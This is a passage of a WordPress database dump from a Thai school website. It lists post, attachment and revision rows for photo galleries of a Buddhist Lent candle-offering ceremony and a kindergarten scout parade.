src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565542-1024x871.jpg\" alt=\"\" class=\"wp-image-644\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":645,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565543-1024x768.jpg\" alt=\"\" class=\"wp-image-645\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":646,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565546-1024x768.jpg\" alt=\"\" class=\"wp-image-646\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":647,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-724x1024.jpg\" alt=\"\" class=\"wp-image-647\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','กิจกรรมถวายเทียนพรรษา เนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','publish','open','open','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%96%e0%b8%a7%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9e%e0%b8%a3%e0%b8%a3%e0%b8%a9%e0%b8%b2-%e0%b9%80','','','2025-07-14 10:25:25','2025-07-14 03:25:25','',0,'http://watprato.ssk.in.th/?p=625',0,'post','',0),
(626,1,'2025-07-14 10:24:06','2025-07-14 03:24:06','','S__28565515','','inherit','open','closed','','s__28565515','','','2025-07-14 10:24:06','2025-07-14 03:24:06','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565515.jpg',0,'attachment','image/jpeg',0),
(627,1,'2025-07-14 10:24:07','2025-07-14 03:24:07','','S__28565516','','inherit','open','closed','','s__28565516','','','2025-07-14 10:24:07','2025-07-14 03:24:07','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565516.jpg',0,'attachment','image/jpeg',0),
(628,1,'2025-07-14 10:24:07','2025-07-14 03:24:07','','S__28565521_0','','inherit','open','closed','','s__28565521_0','','','2025-07-14 10:24:07','2025-07-14 03:24:07','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565521_0.jpg',0,'attachment','image/jpeg',0),
(629,1,'2025-07-14 10:24:07','2025-07-14 03:24:07','','S__28565519_0','','inherit','open','closed','','s__28565519_0','','','2025-07-14 10:24:07','2025-07-14 03:24:07','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565519_0.jpg',0,'attachment','image/jpeg',0),
(630,1,'2025-07-14 10:24:07','2025-07-14 03:24:07','','S__28565520_0','','inherit','open','closed','','s__28565520_0','','','2025-07-14 10:24:07','2025-07-14 03:24:07','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565520_0.jpg',0,'attachment','image/jpeg',0),
(631,1,'2025-07-14 10:24:08','2025-07-14 03:24:08','','S__28565517_0','','inherit','open','closed','','s__28565517_0','','','2025-07-14 10:24:08','2025-07-14 03:24:08','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565517_0.jpg',0,'attachment','image/jpeg',0),
(632,1,'2025-07-14 10:24:08','2025-07-14 03:24:08','','S__28565522','','inherit','open','closed','','s__28565522','','','2025-07-14 10:24:08','2025-07-14 03:24:08','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565522.jpg',0,'attachment','image/jpeg',0),
(633,1,'2025-07-14 10:24:09','2025-07-14 03:24:09','','S__28565523','','inherit','open','closed','','s__28565523','','','2025-07-14 10:24:09','2025-07-14 03:24:09','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565523.jpg',0,'attachment','image/jpeg',0),
(634,1,'2025-07-14 10:24:10','2025-07-14 03:24:10','','S__28565526','','inherit','open','closed','','s__28565526','','','2025-07-14 10:24:10','2025-07-14 03:24:10','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565526.jpg',0,'attachment','image/jpeg',0),
(635,1,'2025-07-14 10:24:11','2025-07-14 03:24:11','','S__28565533','','inherit','open','closed','','s__28565533','','','2025-07-14 10:24:11','2025-07-14 03:24:11','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565533.jpg',0,'attachment','image/jpeg',0),
(636,1,'2025-07-14 10:24:11','2025-07-14 03:24:11','','S__28565532','','inherit','open','closed','','s__28565532','','','2025-07-14 10:24:11','2025-07-14 03:24:11','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565532.jpg',0,'attachment','image/jpeg',0),
(637,1,'2025-07-14 10:24:12','2025-07-14 03:24:12','','S__28565536','','inherit','open','closed','','s__28565536','','','2025-07-14 10:24:12','2025-07-14 03:24:12','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565536.jpg',0,'attachment','image/jpeg',0),
(638,1,'2025-07-14 10:24:12','2025-07-14 03:24:12','','S__28565534','','inherit','open','closed','','s__28565534','','','2025-07-14 10:24:12','2025-07-14 03:24:12','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565534.jpg',0,'attachment','image/jpeg',0),
(639,1,'2025-07-14 10:24:13','2025-07-14 03:24:13','','S__28565535','','inherit','open','closed','','s__28565535','','','2025-07-14 10:24:13','2025-07-14 03:24:13','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565535.jpg',0,'attachment','image/jpeg',0),
(640,1,'2025-07-14 10:24:14','2025-07-14 03:24:14','','S__28565537_0','','inherit','open','closed','','s__28565537_0','','','2025-07-14 10:24:14','2025-07-14 03:24:14','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565537_0.jpg',0,'attachment','image/jpeg',0),
(641,1,'2025-07-14 10:24:14','2025-07-14 03:24:14','','S__28565539_0','','inherit','open','closed','','s__28565539_0','','','2025-07-14 10:24:14','2025-07-14 03:24:14','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565539_0.jpg',0,'attachment','image/jpeg',0),
(642,1,'2025-07-14 10:24:14','2025-07-14 03:24:14','','S__28565540_0','','inherit','open','closed','','s__28565540_0','','','2025-07-14 10:24:14','2025-07-14 03:24:14','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565540_0.jpg',0,'attachment','image/jpeg',0),
(643,1,'2025-07-14 10:24:15','2025-07-14 03:24:15','','S__28565541','','inherit','open','closed','','s__28565541','','','2025-07-14 10:24:15','2025-07-14 03:24:15','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565541.jpg',0,'attachment','image/jpeg',0),
(644,1,'2025-07-14 10:24:16','2025-07-14 03:24:16','','S__28565542','','inherit','open','closed','','s__28565542','','','2025-07-14 10:24:16','2025-07-14 03:24:16','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565542.jpg',0,'attachment','image/jpeg',0),
(645,1,'2025-07-14 10:24:17','2025-07-14 03:24:17','','S__28565543','','inherit','open','closed','','s__28565543','','','2025-07-14 10:24:17','2025-07-14 03:24:17','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565543.jpg',0,'attachment','image/jpeg',0),
(646,1,'2025-07-14 10:24:18','2025-07-14 03:24:18','','S__28565546','','inherit','open','closed','','s__28565546','','','2025-07-14 10:24:18','2025-07-14 03:24:18','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565546.jpg',0,'attachment','image/jpeg',0),
(647,1,'2025-07-14 10:24:18','2025-07-14 03:24:18','','สีม่วง สีชมพู สีครีมโมเดิร์น เรียบง่าย ทาง','','inherit','open','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%a1%e0%b9%88%e0%b8%a7%e0%b8%87-%e0%b8%aa%e0%b8%b5%e0%b8%8a%e0%b8%a1%e0%b8%9e%e0%b8%b9-%e0%b8%aa%e0%b8%b5%e0%b8%84%e0%b8%a3%e0%b8%b5%e0%b8%a1%e0%b9%82%e0%b8%a1%e0%b9%80%e0%b8%94','','','2025-07-14 10:24:18','2025-07-14 03:24:18','',625,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง.jpg',0,'attachment','image/jpeg',0),
(648,1,'2025-07-14 10:25:05','2025-07-14 03:25:05','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":626,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565515-1024x643.jpg\" alt=\"\" class=\"wp-image-626\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":627,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565516-1024x796.jpg\" alt=\"\" class=\"wp-image-627\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":631,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565517_0-1024x768.jpg\" alt=\"\" class=\"wp-image-631\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":629,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565519_0-1024x553.jpg\" alt=\"\" class=\"wp-image-629\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":630,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565520_0-1024x768.jpg\" alt=\"\" class=\"wp-image-630\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":628,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565521_0-1024x714.jpg\" alt=\"\" class=\"wp-image-628\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":632,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565522-1024x768.jpg\" alt=\"\" class=\"wp-image-632\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":633,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565523-1024x768.jpg\" alt=\"\" class=\"wp-image-633\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":634,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565526-1024x673.jpg\" alt=\"\" class=\"wp-image-634\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":636,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565532-1024x769.jpg\" alt=\"\" class=\"wp-image-636\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":635,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565533-1006x1024.jpg\" alt=\"\" class=\"wp-image-635\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565534-1024x876.jpg\" alt=\"\" class=\"wp-image-638\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":639,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565535-1024x768.jpg\" alt=\"\" class=\"wp-image-639\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":637,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565536-1024x768.jpg\" alt=\"\" class=\"wp-image-637\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":640,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565537_0-1024x768.jpg\" alt=\"\" class=\"wp-image-640\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":641,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565539_0-1024x768.jpg\" alt=\"\" class=\"wp-image-641\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":642,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565540_0-1024x768.jpg\" alt=\"\" class=\"wp-image-642\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":643,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565541-1024x768.jpg\" alt=\"\" class=\"wp-image-643\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":644,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565542-1024x871.jpg\" alt=\"\" class=\"wp-image-644\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":645,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565543-1024x768.jpg\" alt=\"\" class=\"wp-image-645\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":646,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565546-1024x768.jpg\" alt=\"\" class=\"wp-image-646\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":647,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-724x1024.jpg\" alt=\"\" class=\"wp-image-647\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','กิจกรรมถวายเทียนพรรษา เนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','inherit','closed','closed','','625-revision-v1','','','2025-07-14 10:25:05','2025-07-14 03:25:05','',625,'http://watprato.ssk.in.th/?p=648',0,'revision','',0),
(649,1,'2025-07-14 11:49:44','2025-07-14 04:49:44','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":658,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516551442_122236779134202781_7691696061389877814_n-724x1024.jpg\" alt=\"\" class=\"wp-image-658\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":650,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516889811_122236778258202781_3453033589191824999_n.jpg\" alt=\"\" class=\"wp-image-650\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":651,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517253900_122236779104202781_4324879715934509579_n-1024x712.jpg\" alt=\"\" class=\"wp-image-651\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":654,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517451733_122236779278202781_1522907675236675485_n-1024x769.jpg\" alt=\"\" class=\"wp-image-654\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":653,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517570952_122236779188202781_5369874677855654429_n-1024x609.jpg\" alt=\"\" class=\"wp-image-653\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":652,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517587114_122236779326202781_2473954371845367166_n-1024x836.jpg\" alt=\"\" class=\"wp-image-652\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":655,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517594604_122236779272202781_8916834928080989461_n-1024x687.jpg\" alt=\"\" class=\"wp-image-655\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":656,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518287046_122236778510202781_8542291167795515244_n.jpg\" alt=\"\" class=\"wp-image-656\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":657,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518373994_122236779308202781_979526566635401952_n-1024x656.jpg\" alt=\"\" class=\"wp-image-657\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โรงเรียนอนุบาลวัดพระโต เข้าร่วมพิธีทบทวนคำปฏิญาณและสวนสนาม เนื่องในวันคล้ายวันสถาปนาลูกเสือแห่งชาติ ประจำปีการศึกษา 2568','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82-13','','','2025-07-14 11:50:00','2025-07-14 04:50:00','',0,'http://watprato.ssk.in.th/?p=649',0,'post','',0),
(650,1,'2025-07-14 11:49:11','2025-07-14 04:49:11','','516889811_122236778258202781_3453033589191824999_n','','inherit','open','closed','','516889811_122236778258202781_3453033589191824999_n','','','2025-07-14 11:49:11','2025-07-14 04:49:11','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/516889811_122236778258202781_3453033589191824999_n.jpg',0,'attachment','image/jpeg',0),
(651,1,'2025-07-14 11:49:12','2025-07-14 04:49:12','','517253900_122236779104202781_4324879715934509579_n','','inherit','open','closed','','517253900_122236779104202781_4324879715934509579_n','','','2025-07-14 11:49:12','2025-07-14 04:49:12','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517253900_122236779104202781_4324879715934509579_n.jpg',0,'attachment','image/jpeg',0),
(652,1,'2025-07-14 11:49:12','2025-07-14 04:49:12','','517587114_122236779326202781_2473954371845367166_n','','inherit','open','closed','','517587114_122236779326202781_2473954371845367166_n','','','2025-07-14 11:49:12','2025-07-14 04:49:12','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517587114_122236779326202781_2473954371845367166_n.jpg',0,'attachment','image/jpeg',0),
(653,1,'2025-07-14 11:49:12','2025-07-14 04:49:12','','517570952_122236779188202781_5369874677855654429_n','','inherit','open','closed','','517570952_122236779188202781_5369874677855654429_n','','','2025-07-14 11:49:12','2025-07-14 04:49:12','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517570952_122236779188202781_5369874677855654429_n.jpg',0,'attachment','image/jpeg',0),
(654,1,'2025-07-14 11:49:12','2025-07-14 04:49:12','','517451733_122236779278202781_1522907675236675485_n','','inherit','open','closed','','517451733_122236779278202781_1522907675236675485_n','','','2025-07-14 11:49:12','2025-07-14 04:49:12','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517451733_122236779278202781_1522907675236675485_n.jpg',0,'attachment','image/jpeg',0),
(655,1,'2025-07-14 11:49:12','2025-07-14 04:49:12','','517594604_122236779272202781_8916834928080989461_n','','inherit','open','closed','','517594604_122236779272202781_8916834928080989461_n','','','2025-07-14 11:49:12','2025-07-14 04:49:12','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517594604_122236779272202781_8916834928080989461_n.jpg',0,'attachment','image/jpeg',0),
(656,1,'2025-07-14 11:49:13','2025-07-14 04:49:13','','518287046_122236778510202781_8542291167795515244_n','','inherit','open','closed','','518287046_122236778510202781_8542291167795515244_n','','','2025-07-14 11:49:13','2025-07-14 04:49:13','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518287046_122236778510202781_8542291167795515244_n.jpg',0,'attachment','image/jpeg',0),
(657,1,'2025-07-14 11:49:14','2025-07-14 04:49:14','','518373994_122236779308202781_979526566635401952_n','','inherit','open','closed','','518373994_122236779308202781_979526566635401952_n','','','2025-07-14 11:49:14','2025-07-14 04:49:14','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518373994_122236779308202781_979526566635401952_n.jpg',0,'attachment','image/jpeg',0),
(658,1,'2025-07-14 11:49:14','2025-07-14 04:49:14','','516551442_122236779134202781_7691696061389877814_n','','inherit','open','closed','','516551442_122236779134202781_7691696061389877814_n','','','2025-07-14 11:49:14','2025-07-14 04:49:14','',649,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/516551442_122236779134202781_7691696061389877814_n.jpg',0,'attachment','image/jpeg',0),
(659,1,'2025-07-14 11:49:44','2025-07-14 04:49:44','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":658,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516551442_122236779134202781_7691696061389877814_n-724x1024.jpg\" alt=\"\" class=\"wp-image-658\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":650,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516889811_122236778258202781_3453033589191824999_n.jpg\" alt=\"\" class=\"wp-image-650\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":651,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517253900_122236779104202781_4324879715934509579_n-1024x712.jpg\" alt=\"\" class=\"wp-image-651\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":654,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517451733_122236779278202781_1522907675236675485_n-1024x769.jpg\" alt=\"\" class=\"wp-image-654\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":653,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517570952_122236779188202781_5369874677855654429_n-1024x609.jpg\" alt=\"\" class=\"wp-image-653\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":652,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517587114_122236779326202781_2473954371845367166_n-1024x836.jpg\" alt=\"\" class=\"wp-image-652\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":655,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517594604_122236779272202781_8916834928080989461_n-1024x687.jpg\" alt=\"\" class=\"wp-image-655\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":656,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518287046_122236778510202781_8542291167795515244_n.jpg\" alt=\"\" class=\"wp-image-656\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":657,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518373994_122236779308202781_979526566635401952_n-1024x656.jpg\" alt=\"\" class=\"wp-image-657\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โรงเรียนอนุบาลวัดพระโต เข้าร่วมพิธีทบทวนคำปฏิญาณและสวนสนาม เนื่องในวันคล้ายวันสถาปนาลูกเสือแห่งชาติ ประจำปีการศึกษา 2568','','inherit','closed','closed','','649-revision-v1','','','2025-07-14 11:49:44','2025-07-14 04:49:44','',649,'http://watprato.ssk.in.th/?p=659',0,'revision','',0),
(660,1,'2025-07-14 11:52:26','2025-07-14 04:52:26','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":661,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516551442_122236779134202781_7691696061389877814_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-661\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โรงเรียนอนุบาลวัดพระโต เข้าร่วมพิธีทบทวนคำปฏิญาณและสวนสนาม เนื่องในวันคล้ายวันสถาปนาลูกเสือแห่งชาติ ประจำปีการศึกษา 2568','','publish','open','open','','660','','','2025-07-14 15:31:33','2025-07-14 08:31:33','',0,'http://watprato.ssk.in.th/?p=660',0,'post','',0),
(661,1,'2025-07-14 11:52:13','2025-07-14 04:52:13','','516551442_122236779134202781_7691696061389877814_n','','inherit','open','closed','','516551442_122236779134202781_7691696061389877814_n-2','','','2025-07-14 11:52:13','2025-07-14 04:52:13','',660,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/516551442_122236779134202781_7691696061389877814_n-1.jpg',0,'attachment','image/jpeg',0),
(662,1,'2025-07-14 11:52:26','2025-07-14 04:52:26','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":661,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516551442_122236779134202781_7691696061389877814_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-661\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','','','inherit','closed','closed','','660-revision-v1','','','2025-07-14 11:52:26','2025-07-14 04:52:26','',660,'http://watprato.ssk.in.th/?p=662',0,'revision','',0),
